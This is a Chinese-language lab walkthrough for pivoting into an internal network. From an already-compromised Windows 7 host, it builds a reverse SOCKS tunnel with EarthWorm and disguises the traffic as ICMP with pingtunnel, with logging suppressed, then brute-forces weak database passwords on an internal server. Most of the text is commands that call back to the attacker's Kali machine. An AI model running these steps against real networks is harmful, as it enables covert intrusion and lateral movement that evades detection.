0x00 實驗環境
攻擊機:win(192.168.43.131)+kali(192.168.43.217)
受害機:win7(IP:192.168.43.50、192.168.59.133;雙網卡,一個公網一個內網)、winserver2008(IP:192.168.59.18;僅主機:一個內網)
0x01 實驗效果
在已經拿到公網win7服務器的前提下,通過ew與pingtunnel搭建能通往winserver2008的隧道,獲取winserver2008的服務器權限
0x02 實驗准備
工具:ew、pingtunnel、proxifer(代理工具)
https://github.com/idlefire/ew
https://github.com/esrrhs/pingtunnel
proxifer官網自行下載
工具介紹:
ew
EarthWorm是一款用於開啟 SOCKS v5 代理服務的工具,基於標准 C 開發,可提供多平台間的轉接通訊,用於復雜網絡環境下的數據轉發。
pingtunnel
pingtunnel 是把 tcp/udp/sock5 流量偽裝成 icmp 流量進行轉發的工具
0x03 打通隧道
1、kali執行:
./ew_for_linux64 -s rcsocks -l 10080 -e 8898
10080作為連接隧道的端口,8898作為隧道的通道,可以想象為,通向內網主機的路口為10080,走的這條路為8898。8898上所有的人(流量)都會通往10080這個路口。
2、kali執行:
./pingtunnel -type server
意思是將ew啟動的sock5協議轉換為icmp協議來隱藏傳輸
3、肉雞win7執行:
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
意思是8898這條路上的sock5流量信息隱藏為icmp類型的數據在本肉雞的9999端口進行轉發。
4、肉雞win7執行:
ew.exe -s rssocks -d 127.0.0.1 -e 9999
在本肉雞9999端口開啟轉發流量
出現上述錯誤時,是因為你在運行pingtunnel時沒有以管理員的身份運行cmd
如下就可以顯示成功了:
5、kali上出現OK字樣時表示代理搭建完成:
6、使用proxifer來訪問內網:
此時再次訪問win2008那台僅僅為內網的主機:
7、kali通過win7搭建了隧道,實現了內網橫向的證明:ping winserver2008是不通的,但是掛好代理可以進行59.18的數據庫弱口令爆破!